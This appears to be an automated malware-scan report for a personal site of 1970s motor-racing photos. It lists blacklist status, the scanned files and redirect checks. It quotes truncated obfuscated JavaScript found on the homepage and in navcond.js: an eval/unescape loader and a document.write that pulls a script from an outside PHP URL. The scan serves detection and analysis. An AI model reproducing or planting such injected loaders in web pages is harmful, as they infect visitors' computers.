Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=absw04543.pwp.blueyonder.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.absw04543.pwp.blueyonder.co.uk/ | 200 OK Content-Length: 15024 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jbhq.co.uk <html> <head> </head> <body> <script type="text/javascript"> <!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%71%32%64%33%32%37%66%64%38%63%32%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%32%34%30%33%31%38%34%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61 ...[4406 bytes skipped]... | ||
http://www.absw04543.pwp.blueyonder.co.uk/home/index.html | 200 OK Content-Length: 2789 Content-Type: text/html | clean |
http://www.absw04543.pwp.blueyonder.co.uk/home/navcond.js | 200 OK Content-Length: 44039 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3516 bytes skipped]... Zq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5bZq5eZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[ifx]("Zq");}hxf=dnkk;fshwva=[];for(dgm=22-20-2;-dgm 1384!=0;dgm =1){jpsuj=dgm;if((0x19==031))fshwva =bbilfv.fromCharCode(eval(lbenyo hxf[1*jpsuj]) 0xa-lufsx);}yanu=eval;z=123;if(Math.ceil(5.5)===6)yanu(fshwva)} document.write('<script src="http://www.creditrehabvacaville.com/CQjhX1uO.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.absw04543.pwp.blueyonder.co.uk/test404page.js | 404 Not found Content-Length: 1000 Content-Type: text/html | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730322 Keith Holland -- F5000 Trojan - ROC.jpg | 200 OK Content-Length: 56300 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730322 Keith Holland -- Trojan - Daily Mail ROC.jpg | 200 OK Content-Length: 60773 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730322 Tony Trimmer -- ISO-Marlboro - ROC.jpg | 200 OK Content-Length: 63895 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Frank Gardner & Brian Muir -- TT.jpg | 200 OK Content-Length: 117178 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Gerry Birrell -- Chevron-Hart =- Clark Memorial Hockenheim.jpg | 200 OK Content-Length: 75496 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Jochen Mass & Derek Bell -- Surtees TS15s - Hochenheim.jpg | 200 OK Content-Length: 55894 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730412 Jochen Mass Surtees -- TS15 - Paul Ricard.jpg | 200 OK Content-Length: 51308 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730419 Niven v. Dryden - Ingliston.jpg | 200 OK Content-Length: 83829 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730426 Colin Vandervell & Roger Williamson -- March-BMW & Wheatcroft GRD - Thruxton.jpg | 200 OK Content-Length: 99500 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730426 Jock Russell -- McRae where - u got Ingliston Russell pics.jpg | 200 OK Content-Length: 122535 Content-Type: image/jpeg | clean |
http://www.absw04543.pwp.blueyonder.co.uk/730524 Chris Amon -- Tecno-Pederzani - 6thZolder.jpg | 200 OK Content-Length: 95509 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: absw04543.pwp.blueyonder.co.uk
Result:
GET / HTTP/1.1
Host: absw04543.pwp.blueyonder.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: absw04543.pwp.blueyonder.co.uk
Referer: http://www.google.com/search?q=absw04543.pwp.blueyonder.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: absw04543.pwp.blueyonder.co.uk
Referer: http://www.google.com/search?q=absw04543.pwp.blueyonder.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.